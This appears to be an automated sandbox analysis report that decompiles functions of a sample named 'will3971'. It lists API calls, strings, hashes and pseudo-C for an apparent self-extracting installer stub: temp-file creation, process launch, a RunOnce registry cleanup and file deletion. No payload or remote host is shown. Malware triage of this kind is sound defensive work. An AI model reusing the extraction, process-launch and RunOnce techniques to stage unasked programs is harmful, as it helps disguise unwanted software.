0x002f2573
0x002f2575
0x002f2578
0x002f257d
0x002f2627
0x002f2583
0x002f2586
0x002f2589
0x002f25eb
0x002f2607
0x00000000
0x002f2609
0x002f261a
0x00000000
0x002f261a
0x00000000
0x002f258b
0x002f258b
0x002f259e
0x002f25b2
0x002f25ba
0x002f25cb
0x002f25d1
0x002f25d6
0x002f25da
0x002f25dd
0x002f25dd
0x002f25e3
0x002f25e3
0x002f25e3
0x002f258b
0x002f2589
0x002f262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,002F4096,002F4096,?,002F1ED3,00000001,00000000,?,?,002F4137,?), ref: 002F25B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,002F4096,?,002F1ED3,00000001,00000000,?,?,002F4137,?,002F4096), ref: 002F25CB
RegCloseKey.KERNELBASE(?,?,002F1ED3,00000001,00000000,?,?,002F4137,?,002F4096), ref: 002F25DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,002F4096,002F4096,?,002F1ED3,00000001,00000000,?,?,002F4137,?), ref: 002F25FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,002F4096,00000000,00000000,00000000,00000000,?,002F1ED3,00000001,00000000), ref: 002F261A

Strings

PendingFileRenameOperations, xrefs: 002F25C3
System\CurrentControlSet\Control\Session Manager, xrefs: 002F25A8
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 002F25F5

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: ca5b9d473026fba28289ec9dc34a8aa6fd620c51a3b0e4bfd9bf748549cbc73e
Instruction ID: 7e0e5fddecfa737bcad796223b079f90c2e633aa4fb124f9eb10c805ffacee79
Opcode Fuzzy Hash: ca5b9d473026fba28289ec9dc34a8aa6fd620c51a3b0e4bfd9bf748549cbc73e
Instruction Fuzzy Hash: AB11607592222DFB9F209B91AC0DDFBFE6CDF027E1F504075BA08E2040DA705A58D6A1

Uniqueness

Uniqueness Score: -1.00%

Function 002F6A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E002F7155();
				_push(0x58);
				_push(0x2f72b8);
				E002F7208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x2f88b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x2f88b0; // 0x2
						if(__eflags != 0) {
							 *0x2f81e4 = _t58;
							goto L13;
						} else {
							 *0x2f88b0 = _t58;
							_t37 = E002F6C3F(0x2f10b8, 0x2f10c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L002F6FF4();
						L13:
						_t68 =  *0x2f88b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x2f10b4);
							_push(0x2f10ac);
							L002F7202();
							 *0x2f88b0 = 2;
						}
						if(_t53 == 0) {
							 *0x2f88ac = 0;
						}
						_t71 =  *0x2f88b4;
						if( *0x2f88b4 != 0 && E002F7060(_t71, 0x2f88b4) != 0) {
							_t60 =  *0x2f88b4; // 0x0
							 *0x2fa288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x76665b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E002F2BFB(0x2f0000, 0, _t59); // executed
							 *0x2f81e0 = _t30;
							__eflags =  *0x2f81f8;
							if( *0x2f81f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x2f81e4;
							if( *0x2f81e4 == 0) {
								__imp___cexit();
								_t30 =  *0x2f81e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E002F724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x002f6a60
0x002f6a6a
0x002f6a6c
0x002f6a71
0x002f6a78
0x002f6a7f
0x002f6a85
0x002f6a8e
0x002f6a91
0x002f6a93
0x002f6a9c
0x002f6aa2
0x00000000
0x00000000
0x002f6aa6
0x002f6ab4
0x00000000
0x002f6aa8
0x002f6aaa
0x002f6aab
0x002f6aab
0x002f6abf
0x002f6abf
0x002f6ac5
0x002f6ad1
0x002f6ad7
0x002f6b05
0x00000000
0x002f6ad9
0x002f6ad9
0x002f6ae9
0x002f6af0
0x002f6af2
0x00000000
0x002f6af4
0x002f6af4
0x002f6afb
0x002f6afb
0x002f6af2
0x002f6ac7
0x002f6ac7
0x002f6ac9
0x002f6b0b
0x002f6b0b
0x002f6b11
0x002f6b13
0x002f6b18
0x002f6b1d
0x002f6b24
0x002f6b24
0x002f6b30
0x002f6b39
0x002f6b39
0x002f6b3b
0x002f6b42
0x002f6b57
0x002f6b5f
0x002f6b65
0x002f6b65
0x002f6b67
0x002f6b6c
0x002f6b6e
0x002f6b71
0x002f6b74
0x002f6b74
0x002f6b79
0x00000000
0x00000000
0x002f6b7d
0x002f6b81
0x00000000
0x00000000
0x002f6b83
0x002f6b8c
0x002f6b8d
0x002f6b90
0x002f6b90
0x002f6b83
0x002f6b81
0x002f6b94
0x002f6b98
0x002f6ba2
0x002f6b9a
0x002f6b9a
0x002f6b9a
0x002f6ba3
0x002f6bab
0x002f6bb0
0x002f6bb5
0x002f6bbc
0x002f6bbf
0x00000000
0x002f6bbf
0x002f6c1e
0x002f6c25
0x002f6c27
0x002f6c2d
0x002f6c2d
0x002f6c32
0x00000000
0x002f6bc5
0x002f6bc5
0x002f6bc8
0x002f6bcc
0x002f6bce
0x002f6bce
0x002f6bd1
0x002f6bd3
0x002f6bd3
0x002f6bd6
0x002f6bda
0x002f6be1
0x002f6be3
0x002f6be5
0x002f6be5
0x002f6be6
0x002f6be6
0x002f6be9
0x002f6bea
0x002f6bea
0x002f6b74
0x002f6c39
0x002f6c3e
0x002f6c3e
0x002f6abe
0x002f6abe
0x00000000

APIs

Part of subcall function 002F7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 002F7182
Part of subcall function 002F7155: GetCurrentProcessId.KERNEL32 ref: 002F7191
Part of subcall function 002F7155: GetCurrentThreadId.KERNEL32 ref: 002F719A
Part of subcall function 002F7155: GetTickCount.KERNEL32 ref: 002F71A3
Part of subcall function 002F7155: QueryPerformanceCounter.KERNEL32(?), ref: 002F71B8

GetStartupInfoW.KERNEL32(?,002F72B8,00000058), ref: 002F6A7F
Sleep.KERNEL32(000003E8), ref: 002F6AB4
_amsg_exit.MSVCRT ref: 002F6AC9
_initterm.MSVCRT ref: 002F6B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 002F6B49
exit.KERNELBASE ref: 002F6BBF
_ismbblead.MSVCRT ref: 002F6BDA

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 8548611e9310da39807f8e491b86af57854771a1d0e2edeee45d8475e3b28f62
Instruction ID: 21a8702fc7a1390c7a5a9975514fc95310b4c360532f27e9c9a798b28a4989b4
Opcode Fuzzy Hash: 8548611e9310da39807f8e491b86af57854771a1d0e2edeee45d8475e3b28f62
Instruction Fuzzy Hash: 0341C27197422EDBDB219F68E81D77AF7A0EB457E4F54013AEA45E3290CF704861CB80

Uniqueness

Uniqueness Score: -1.00%

Function 002F58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E002F58C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E002F1680(_t20, _t36, _t33);
					E002F658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x2f9124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E002F44B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x2f9124 = E002F6285();
					_t14 = 0;
				}
				return _t14;
			}

0x002f58cd
0x002f58d1
0x002f58d3
0x002f58d5
0x002f58d8
0x002f58d8
0x002f58da
0x002f58db
0x002f58e1
0x002f58ed
0x002f58f1
0x002f591e
0x002f592c
0x002f5943
0x002f594a
0x002f594d
0x002f5953
0x002f5959
0x00000000
0x002f595b
0x002f595c
0x002f5963
0x002f596c
0x00000000
0x002f5972
0x002f5974
0x002f597a
0x002f597a
0x002f596c
0x002f58f3
0x002f5901
0x002f5906
0x002f590b
0x002f5910
0x002f5910
0x002f5918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,002F5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F58E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,002F5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5943
LocalFree.KERNEL32(00000000,?,002F5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F594D
CloseHandle.KERNEL32(00000000,?,002F5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,002F5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5963

Strings

TMP4351$.TMP, xrefs: 002F5923
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F58CD, 002F58CF, 002F5919, 002F5962

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
API String ID: 747627703-441577946
Opcode ID: 69da87bdd4b9fd7da27f0b51b2e35f1798da474da966e63ac2d6ed75206d2dd4
Instruction ID: 3d92dba37a1fef1f53d8b804e9e6915ea15ea0845ab4415a7004ae17d2bd191f
Opcode Fuzzy Hash: 69da87bdd4b9fd7da27f0b51b2e35f1798da474da966e63ac2d6ed75206d2dd4
Instruction Fuzzy Hash: DB11067161022966D7245F796C0DFB7BA59DF467F0B100635B70AD2181CAB09825C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 002F3FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E002F3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x2f8004; // 0x404cc811
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E002F6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x2f9124 = E002F6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E002F44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x2f8a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x2f9a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x2f9a2c = _t44;
						}
					}
				}
				E002F411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x2f9a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x002f3fef
0x002f3ffa
0x002f4001
0x002f4008
0x002f400a
0x002f400b
0x002f4010
0x002f410a
0x002f411a
0x002f411a
0x002f401c
0x002f401d
0x002f401e
0x002f401f
0x002f4033
0x002f403b
0x002f40ca
0x002f40e9
0x002f40f8
0x002f4101
0x002f4106
0x002f4106
0x002f4108
0x002f4108
0x00000000
0x002f4108
0x002f4049
0x002f405c
0x002f4062
0x002f4068
0x002f406e
0x002f4070
0x002f4077
0x002f407f
0x002f4089
0x002f408b
0x002f408b
0x002f4089
0x002f4077
0x002f4091
0x002f409c
0x002f40a8
0x002f40b8
0x00000000
0x002f40c2
0x00000000
0x002f40c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 002F4033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 002F4049
GetExitCodeProcess.KERNELBASE ref: 002F405C
CloseHandle.KERNEL32(?), ref: 002F409C
CloseHandle.KERNEL32(?), ref: 002F40A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 002F40DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 002F40E9

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 1d854bb7168f8c75a7fd79190b6ef90bf87c7c6d7f543128031dad270a1e9db0
Instruction ID: 8cb499f3c35e44320eb9c6927b02badb2fad09a983d47c5fba7ce1507d89d439
Opcode Fuzzy Hash: 1d854bb7168f8c75a7fd79190b6ef90bf87c7c6d7f543128031dad270a1e9db0
Instruction Fuzzy Hash: F0318F7165021CABEB20AF65EC4DFBBB778EB947A0F2001B9F609E2161CA705D95CE11

Uniqueness

Uniqueness Score: -1.00%

Function 002F51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E002F51E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E002F468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E002F468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E002F44B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x2f9124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x2f9124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E002F44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x2f9124 = 0x80070714;
					goto L10;
				}
				E002F44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x2f9124 = E002F6285();
				goto L10;
			}

0x002f51fb
0x002f5207
0x002f520b
0x002f523c
0x002f5268
0x002f5270
0x002f528b
0x002f5293
0x002f529c
0x002f52a6
0x002f52b0
0x00000000
0x002f52b0
0x002f529e
0x002f5279
0x00000000
0x002f527b
0x002f5273
0x00000000
0x002f5273
0x002f524a
0x002f5250
0x002f5256
0x00000000
0x002f5256
0x002f5219
0x002f5223
0x00000000

APIs

Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,002F2F4D,?,00000002,00000000), ref: 002F5201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 002F5250

Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554

Part of subcall function 002F6285: GetLastError.KERNEL32(002F5BBC), ref: 002F6285

Strings

<None>, xrefs: 002F5262
UPROMPT, xrefs: 002F51EF, 002F5230

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: b0eda541a7bf6ea86b7f26b2d62bab4c8879e088e488d373862f2d8f5ed4d547
Instruction ID: db62dcf9b1c4aeecdc2144fc567fc204efb203174e491566d56be3bd344ddbe8
Opcode Fuzzy Hash: b0eda541a7bf6ea86b7f26b2d62bab4c8879e088e488d373862f2d8f5ed4d547
Instruction Fuzzy Hash: BE11E6B522061DBBE3146B716C4DF3BE19DDBC93E0B10413DBB0AD5190DEB98C208A24

Uniqueness

Uniqueness Score: -1.00%

Function 002F52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E002F52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x2f8004; // 0x404cc811
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x2f91e0; // 0x2bc7b60
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x2f8a24 == 0 &&  *0x2f9a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x2f8a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x2f8a24 == 0 &&  *0x2f9a30 == 0) {
					_push(_t22);
					E002F1781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
					if(( *0x2f9a34 & 0x00000020) != 0) {
						E002F65E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E002F2390( &_v268);
					_t11 =  *0x2f8a20; // 0x0
				}
				if( *0x2f9a40 != 1 && _t11 != 0) {
					_t11 = E002F1FE1(_t22); // executed
				}
				 *0x2f8a20 =  *0x2f8a20 & 0x00000000;
				return E002F6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x002f52b6
0x002f52b6
0x002f52b6
0x002f52c1
0x002f52c8
0x002f52cb
0x002f52cc
0x002f52d4
0x002f52d6
0x002f52d7
0x002f52de
0x002f52e0
0x002f52f2
0x002f52fa
0x002f52fa
0x002f5302
0x002f5305
0x002f530c
0x002f5312
0x002f5316
0x002f5316
0x002f5317
0x002f531c
0x002f531f
0x002f5333
0x002f5345
0x002f5351
0x002f5359
0x002f5359
0x002f5363
0x002f5369
0x002f536f
0x002f5374
0x002f5374
0x002f5381
0x002f5387
0x002f5387
0x002f538f
0x002f53a0

APIs

SetFileAttributesA.KERNELBASE(02BC7B60,00000080,?,00000000), ref: 002F52F2
DeleteFileA.KERNELBASE(02BC7B60), ref: 002F52FA
LocalFree.KERNEL32(02BC7B60,?,00000000), ref: 002F5305
LocalFree.KERNEL32(02BC7B60), ref: 002F530C
SetCurrentDirectoryA.KERNELBASE(002F11FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 002F5363

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F5334

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
API String ID: 2833751637-3249786385
Opcode ID: ef07358b9d34f0f8c96daaf7e654ef21f96a2ca6f16ae7b1be89a693e58e1d29
Instruction ID: 79ba7e73619cca80b86e55ea44aaaeaf1a6040dbd1886965ade2085208c4e1dd
Opcode Fuzzy Hash: ef07358b9d34f0f8c96daaf7e654ef21f96a2ca6f16ae7b1be89a693e58e1d29
Instruction Fuzzy Hash: 8C21893192062ADBDB20AF14FD0DB79B7A4EB107E0F5401B9EA46521A0CFB45CA4CB41

Uniqueness

Uniqueness Score: -1.00%

Function 002F1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F1FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x2f8530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x002f1fee
0x002f2005
0x002f200d
0x002f2017
0x00000000
0x002f2020
0x002f200d
0x002f2029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,002F538C,?,?,002F538C), ref: 002F2005
RegDeleteValueA.KERNELBASE(002F538C,wextract_cleanup3,?,?,002F538C), ref: 002F2017
RegCloseKey.ADVAPI32(002F538C,?,?,002F538C), ref: 002F2020

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 002F1FFB
wextract_cleanup3, xrefs: 002F1FE7, 002F200F

Memory Dump Source

